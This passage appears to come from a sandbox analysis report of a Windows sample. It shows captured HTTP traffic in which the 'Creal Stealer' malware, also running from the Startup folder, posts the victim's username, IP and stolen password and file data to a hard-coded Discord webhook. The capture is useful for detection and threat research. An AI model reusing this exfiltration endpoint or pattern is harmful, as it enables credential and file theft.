                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC79INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                53192.168.2.849767162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=39acd5087cec11efb895f699fc4aef6a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 1
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453951
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYBtQdG4kfaJH1oGxcUbBE98sAkGM44PGnAfmSSdjCWbOQpwQDDP36%2BWTN5d29noNaqY93Mr9wiNUPpp3AOZAn665h%2B5iwEMOrAsK4SawZSIJURDTB%2FrXi8mF%2FQ1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=39acd5087cec11efb895f699fc4aef6a82a9b4750cdf7018f34d51969ca16372a8e4b35b98421de338c03f3e6a99687a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 4a 6d 32 6f 51 61 35 50 45 58 62 35 67 4f 61 59 51 78 71 76 57 34 65 78 30 33 34 42 37 44 77 53 68 4d 4a 33 57 6c 33 62 32 77 2d 31 37 32 37 34 35 33 39 34 39 33 36 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 66 32 61 36 36 34 32 32 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=kJm2oQa5PEXb5gOaYQxqvW4ex034B7DwShMJ3Wl3b2w-1727453949365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04f2a66422f-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                54192.168.2.849768162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=39b2fb687cec11efabf4124b36f1d382; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453952
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP2pxsaji1yu2xtmtTGdkDca6HJpJxjNMtqTAPHoxg9pY4V0MKCyKVGCLDgDRYlOdmmpVM0nJCr1XdZpDZYi2C93hmMJ8TPA7BFHyi6uGefr%2FSjxTplqq%2FT4qyJ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=39b2fb687cec11efabf4124b36f1d382f2fee3e68b0b4e5fe8b64e54d41f7df1e72556bb6b42e6797270bd2db57f4579; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 45 4b 61 50 6c 64 6e 65 52 51 46 49 32 36 67 79 62 44 66 66 45 57 44 49 75 65 4e 31 6c 56 32 76 4b 73 63 32 74 6c 69 57 78 63 2d 31 37 32 37 34 35 33 39 34 39 34 30 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 66 35 61 66 64 34 32 63 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=dEKaPldneRQFI26gybDffEWDIueN1lV2vKsc2tliWxc-1727453949406-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04f5afd42ce-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                55192.168.2.849769162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC1255INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 79
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                retry-after: 1779
                                                                                                                                                                                                                                                                                                x-ratelimit-scope: user
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=39c915607cec11efb4620e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453952
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLjD0hUl%2FNjWMZsG5czkXdaQIZAFc02fVzyM1RF%2F%2FDlqBcwrYGQfPxj1Ftdf%2FrhZ8C8Oj4LWF60Clf44bOLEanHScbhE8OtW5adMS%2BT7As3QNsyM9ilBcSUk5Nmo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=39c915607cec11efb4620e62cbdde762c0fc71884909540d5964f4bd73b55a9c1630117c694597cec1003809b88cba10; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC347INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 34 65 61 63 33 34 34 38 39 62 36 31 31 36 33 38 30 32 61 63 66 34 65 61 66 66 30 31 63 61 33 33 33 38 38 38 33 37 66 35 2d 31 37 32 37 34 35 33 39 34 39 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 76 39 72 4e 33 70 31 42 36 6a 53 36 67 68 38 54 61 55 6e 57 52 59 72 37 54 39 6f 4a 78 6b 50 33 72 6d 59 4f 6c 4f 79 45 39 59 2d 31 37 32 37 34 35 33 39 34 39 35 35 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=gv9rN3p1B6jS6gh8TaUnWRYr7T9oJxkP3rmYOlOyE9Y-1727453949550-0.0.1.1-604800000; path=/; domain=.discor
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC79INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                56192.168.2.849770162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:09 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:10 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3a164cd67cec11ef849f62361d7ce716; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453952
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXNDsMqm7ttp6WcPQ2B4Cq46UaSzT1mWwd%2FCX31hK7PYADbf2F4%2BweKuR9%2FYuHmELLnpSVyZ7nEKgGaRkBX%2FdTQtR6i%2BOFsvBmgHMhbaInYVsj%2BOOaXfdhwxZGk6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3a164cd67cec11ef849f62361d7ce7165874f6569c4d66a6206797eb89e1609cd010cdd05def258c2f3b2a794122a928; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 5f 4e 6b 74 61 67 7a 37 46 4b 30 55 4b 66 68 5a 6f 32 5a 54 49 54 6d 4c 77 43 71 6a 56 58 39 36 34 39 4e 61 47 7a 38 7a 62 6b 2d 31 37 32 37 34 35 33 39 35 30 30 35 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 33 38 66 32 30 30 63 64 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=m_Nktagz7FK0UKfhZo2ZTITmLwCqjVX9649NaGz8zbk-1727453950056-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0538f200cd5-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                57192.168.2.849771162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
